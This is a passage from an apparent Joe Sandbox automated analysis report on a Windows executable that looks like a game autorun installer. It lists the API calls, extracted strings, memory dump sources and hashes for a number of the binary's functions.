                                                                                                                        • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00413B6A
                                                                                                                        • GetSystemDirectoryA.KERNEL32(0045DAF8,00000104), ref: 00413B95
                                                                                                                        • GetWindowsDirectoryA.KERNEL32(0045DD08,00000104), ref: 00413BA5
                                                                                                                        • GetTempPathA.KERNEL32(00000104,0045DE10), ref: 00413BB5
                                                                                                                        • RegOpenKeyExA.ADVAPI32(0040476A), ref: 00413C4F
                                                                                                                        • RegQueryValueExA.ADVAPI32(?,Programs,00000000,?,0045DF18,?), ref: 00413C6F
                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00413C76
                                                                                                                        • _strrchr.LIBCMT ref: 00413D9B
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Directory$AddressCloseLibraryLoadOpenPathProcQuerySystemTempValueWindows_strrchr
                                                                                                                        • String ID: Programs$SHGetSpecialFolderPathA$Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders$\$shell32.dll
                                                                                                                        • API String ID: 1347129311-4127225528
                                                                                                                        • Opcode ID: 20eca63b0d048e5c17978578e2be2ad518ba2d992f55c58b281d0522d216412c
                                                                                                                        • Instruction ID: 6c29c0d113d401325f6edbdc8838ba9d779a9de3388efc35fe5fb8b828dee468
                                                                                                                        • Opcode Fuzzy Hash: 20eca63b0d048e5c17978578e2be2ad518ba2d992f55c58b281d0522d216412c
                                                                                                                        • Instruction Fuzzy Hash: AA512834348341AFE720CF649C16FEB7B945F46B06F14445DF980AB283E6A8D648C7AE
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressDirectoryLibraryLoadProc$PathSystemTempWindows
                                                                                                                        • String ID: 1.0$DisplayName$Folder$Game Registry$Install Dir$Installed From$Language$LogFile$Product GUID$SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\
                                                                                                                        • API String ID: 497994091-4186521962
                                                                                                                        • Opcode ID: a9f3cfae0ee65188ce86cf1ac736f3b955c48210e815747326e6e50c8de1dc14
                                                                                                                        • Instruction ID: 591559e4e45c4ad2df08bd76a610f775a632586859adfb02992c4f405d6477a4
                                                                                                                        • Opcode Fuzzy Hash: a9f3cfae0ee65188ce86cf1ac736f3b955c48210e815747326e6e50c8de1dc14
                                                                                                                        • Instruction Fuzzy Hash: 8FA1F27110C3819FD714DF10C451BEBB7E5AFD8308F044A6EF98957281EB78AA49CBA6
                                                                                                                        APIs
                                                                                                                        • CoInitialize.OLE32(00000000), ref: 0041BD52
                                                                                                                        • CoCreateInstance.OLE32 ref: 0041BD7A
                                                                                                                        • VariantInit.OLEAUT32(?), ref: 0041BE09
                                                                                                                        • VariantClear.OLEAUT32(?), ref: 0041BE4B
                                                                                                                        • VariantClear.OLEAUT32(?), ref: 0041BE85
                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000008,0000000A,00000000,00000000), ref: 0041BEBD
                                                                                                                        • VariantClear.OLEAUT32(?), ref: 0041BEDB
                                                                                                                        • CoUninitialize.OLE32 ref: 0041BF1D
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Variant$Clear$ByteCharCreateInitInitializeInstanceMultiUninitializeWide
                                                                                                                        • String ID: DxDiag_SystemInfo$dwDirectXVersionMajor$dwDirectXVersionMinor$o$szDirectXVersionLetter
                                                                                                                        • API String ID: 2631059323-2475506770
                                                                                                                        • Opcode ID: 45ec07c7a0de31864688631775407bbafd12fcb00f604bec3ea34e2fc70ed8bd
                                                                                                                        • Instruction ID: b5decee8adbc2d1d78082e6867677709e582f8e87df30048daafc0e7f78e0333
                                                                                                                        • Opcode Fuzzy Hash: 45ec07c7a0de31864688631775407bbafd12fcb00f604bec3ea34e2fc70ed8bd
                                                                                                                        • Instruction Fuzzy Hash: D3511674208381AFD700CF25C884A9BBBE9EFCA704F04894EF584C7261D779D985CBA6
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00414930: LoadLibraryA.KERNEL32(KERNEL32.DLL), ref: 004149A7
                                                                                                                          • Part of subcall function 00414930: GetProcAddress.KERNEL32(00000000,CopyFileExA), ref: 004149BC
                                                                                                                          • Part of subcall function 00413B40: LoadLibraryA.KERNEL32 ref: 00413B5A
                                                                                                                          • Part of subcall function 00413B40: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00413B6A
                                                                                                                          • Part of subcall function 00413B40: GetSystemDirectoryA.KERNEL32(0045DAF8,00000104), ref: 00413B95
                                                                                                                          • Part of subcall function 00413B40: GetWindowsDirectoryA.KERNEL32(0045DD08,00000104), ref: 00413BA5
                                                                                                                          • Part of subcall function 00413B40: GetTempPathA.KERNEL32(00000104,0045DE10), ref: 00413BB5
                                                                                                                        • GetFileAttributesA.KERNEL32(?,?,00000000), ref: 0040C0FD
                                                                                                                        • SetFileAttributesA.KERNEL32(?,00000000), ref: 0040C10C
                                                                                                                        • Sleep.KERNEL32(000001F4), ref: 0040C117
                                                                                                                        • Sleep.KERNEL32(000001F4), ref: 0040C12B
                                                                                                                        • GetFileAttributesA.KERNEL32(?,?,?,?,?,?,00000000), ref: 0040C30F
                                                                                                                        • SetFileAttributesA.KERNEL32(?,00000000,?,?,?,?,?,00000000), ref: 0040C321
                                                                                                                        • Sleep.KERNEL32(000001F4,?,?,?,?,?,00000000), ref: 0040C32C
                                                                                                                        • Sleep.KERNEL32(000001F4,?,?,?,?,?,?,00000000), ref: 0040C343
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AttributesFileSleep$AddressDirectoryLibraryLoadProc$PathSystemTempWindows
                                                                                                                        • String ID: %s\AutoRun.exe$%s\AutoRunGUI.dll$-restart -dir $Could not copy '%s' to '%s'
                                                                                                                        • API String ID: 3057974866-2581532531
                                                                                                                        • Opcode ID: fd5262b79a8323c6ee9bbbd5519ee61f856e7b900ff64039663f89a4e1efefc1
                                                                                                                        • Instruction ID: 5c815c8dee34c80f282a7deb6532afe064d91d0bacc265e00ff7ac027498d6f5
                                                                                                                        • Opcode Fuzzy Hash: fd5262b79a8323c6ee9bbbd5519ee61f856e7b900ff64039663f89a4e1efefc1
                                                                                                                        • Instruction Fuzzy Hash: C8B199B2144340AFD315EBA0CCC5EEB73A9EFC4704F044E2EB58657191EB78A648C79A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: %s\%s$%s\cache.dat$%s\filelist.txt$\$\$\
                                                                                                                        • API String ID: 0-1652018963
                                                                                                                        • Opcode ID: be913b56ed26ee2750d62859451965158e8d14aa541663ac7088a56196c6f96f
                                                                                                                        • Instruction ID: 726ea9fac86a746ee88a84a523912b90f33f2c02f38a423fdf5978b62fbff5e6
                                                                                                                        • Opcode Fuzzy Hash: be913b56ed26ee2750d62859451965158e8d14aa541663ac7088a56196c6f96f
                                                                                                                        • Instruction Fuzzy Hash: 42D15C715083829FC321DB34D894BEBB7E5AF95308F04495EE5C987281EB38D64DCB56
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: %s\%s$%s\cache.dat$%s\filelist.txt$\$\$\
                                                                                                                        • API String ID: 0-1652018963
                                                                                                                        • Opcode ID: 0327c2d6323db41f253a0066c32c2d91ef57ac9b8a11f82df8a7614baadf85a6
                                                                                                                        • Instruction ID: 2d8a66965c8b461d22716a2f9fc51bb70f3807e377028b73b074f7c4a795e774
                                                                                                                        • Opcode Fuzzy Hash: 0327c2d6323db41f253a0066c32c2d91ef57ac9b8a11f82df8a7614baadf85a6
                                                                                                                        • Instruction Fuzzy Hash: B0C15E715083829FC321DB20D894FEBB7E9AF95308F08495EE5C987241EB38D64DCB96
                                                                                                                        APIs
                                                                                                                        • RegEnumKeyExA.ADVAPI32 ref: 004175AE
                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 004175F5
                                                                                                                        • RegOpenKeyExA.ADVAPI32 ref: 0041761F
                                                                                                                        • RegCloseKey.ADVAPI32(?,?), ref: 0041763F
                                                                                                                        • RegDeleteKeyA.ADVAPI32(?,?), ref: 00417651
                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 0041766F
                                                                                                                        • RegCloseKey.ADVAPI32(?,00000000,00020019,?), ref: 00417707
                                                                                                                        • RegOpenKeyExA.ADVAPI32 ref: 00417731
                                                                                                                        • RegDeleteKeyA.ADVAPI32(?,?), ref: 00417744
                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00417755
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Close$DeleteOpen$Enum
                                                                                                                        • String ID: %s\%s
                                                                                                                        • API String ID: 2508677364-4073750446
                                                                                                                        • Opcode ID: 46427c48c67e0cc231f759d9888d3613f253180f667232f7090628fbc8ee51e4
                                                                                                                        • Instruction ID: 890bdd7ef58192d3601e2139cb52636c82b3411bbe28373fb4b23228c678dd54
                                                                                                                        • Opcode Fuzzy Hash: 46427c48c67e0cc231f759d9888d3613f253180f667232f7090628fbc8ee51e4
                                                                                                                        • Instruction Fuzzy Hash: 8C5191B55087419FD320DF58D884AEBB7F8FB89314F044D2EF99683241D7389A48CB66
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll,774D0A60,00000000,0042575D), ref: 0042B11D
                                                                                                                        • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 0042B135
                                                                                                                        • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 0042B142
                                                                                                                        • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 0042B14F
                                                                                                                        • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 0042B15C
                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 0042B1DA
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
